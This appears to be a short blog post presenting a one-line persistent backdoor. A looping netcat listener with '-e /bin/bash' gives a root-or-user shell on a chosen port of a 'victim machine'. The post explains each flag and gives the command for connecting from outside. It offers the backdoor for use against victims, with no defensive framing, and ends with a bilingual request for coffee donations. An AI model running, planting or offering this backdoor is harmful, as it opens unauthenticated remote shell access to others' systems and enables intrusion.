The one line script

$ nohup ...

The one line script

$ nohup bash -c 'while true; do nc -l -e /bin/bash -p ${port}; done' &  

How this works

  • nohup makes this backdoor immune to SIGHUP
  • bash -c ${string} will run the ${string} as command
  • nc -l let nc keep listening on the port
  • nc -e ${sth} means excute ${sth} after connected
  • nc -p to choose a port for nc to listen
  • ${port} is the backdoor port set on the victim machine.
    • You can change it to a port number whatever you like.
  • use shell scripting while for keeping listening

How to use

After run the command above on the victim machine, you can just type

$ nc ${victim_ip} ${port}  

to connect to the victim machine and get a bash shell as the same uid which ran the command.



如果覺得這篇文章對你有幫助, 除了留言讓我知道外, 或許也可以考慮請我喝杯咖啡, 不論金額多寡我都會非常感激且能鼓勵我繼續寫出對你有幫助的文章。

If this blog post happens to be helpful to you, besides of leaving a reply, you may consider buy me a cup of coffee to support me. It would help me write more articles helpful to you in the future and I would really appreciate it.

Related Posts